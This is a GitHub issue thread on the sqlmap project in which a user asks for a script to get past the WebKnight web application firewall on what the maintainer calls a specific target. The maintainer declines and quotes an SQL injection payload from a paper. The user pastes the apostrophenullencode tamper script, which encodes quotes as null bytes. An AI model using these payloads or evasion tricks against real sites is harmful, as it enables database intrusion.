search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.28k stars 5.69k forks source link

Tamper Script for WAF - AQTRONIX WebKnight *Looking for* #957

Closed angelz12 closed 9 years ago

angelz12 commented 9 years ago

web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005

http://www.aqtronix.com/?PageID=99

stamparm commented 9 years ago

If you don't have a solution to give I'll need to close this down

angelz12 commented 9 years ago

http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf http://www.exploit-db.com/papers/17934/

frequenzce for the bypass http://nl.ijs.si:3003/cuwi/dgt_en/frequencies/lc

this i found maybe this work...

stamparm commented 9 years ago

A) http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf says When running the same test against WebKnight we had one successful attempt while using the ‘apostrophenullencode’ tamper script -> so you can use --tamper=apostrophenullencode which I doubt will work in your case

B) http://www.exploit-db.com/papers/17934/ says From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server. -> this doesn't work. Correct me if I am wrong.

Please don't open this kind of Issues if you don't have a solution to give. Learn something about WAF bypasses and then come back. I'll just close further requests like this as invalid

p.s. its obvious from previous Issue requests that you have one target with WebKnight on it. Don't open this kind of Issue requests where you are openly asking for a help to attack a specific web server.

angelz12 commented 9 years ago

so thats the normal ‘apostrophenullencode’ how can i activate it the script bypass is green

!/usr/bin/env python

""" Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """

from lib.core.enums import PRIORITY

priority = PRIORITY.LOWEST

def dependencies(): pass

def tamper(payload, **kwargs): """ Replaces apostrophe character with its illegal double unicode counterpart

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
"""

return payload.replace('\'', "%00%27") if payload else payload

---------------------------------------------bypass of the pdf file i hope thats correct watch here-

‘apostrophenullencode’ change by pdf

!/usr/bin/env python

""" Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """

from lib.core.enums import PRIORITY

priority = PRIORITY.LOWEST

def dependencies(): pass

def tamper(payload, **kwargs): """ Replaces apostrophe character with its illegal double unicode counterpart

>>> tamper(’ or ‘1’=’1)
'%00%27 or %00%271%00%27=%00%271'
"""

return payload.replace('\'', "%00%27") if payload else payload

when i open these scripts in python the bypass is in green like a notice isnt it activatet? can u show me how can the bypass be runnig or i think wrong here?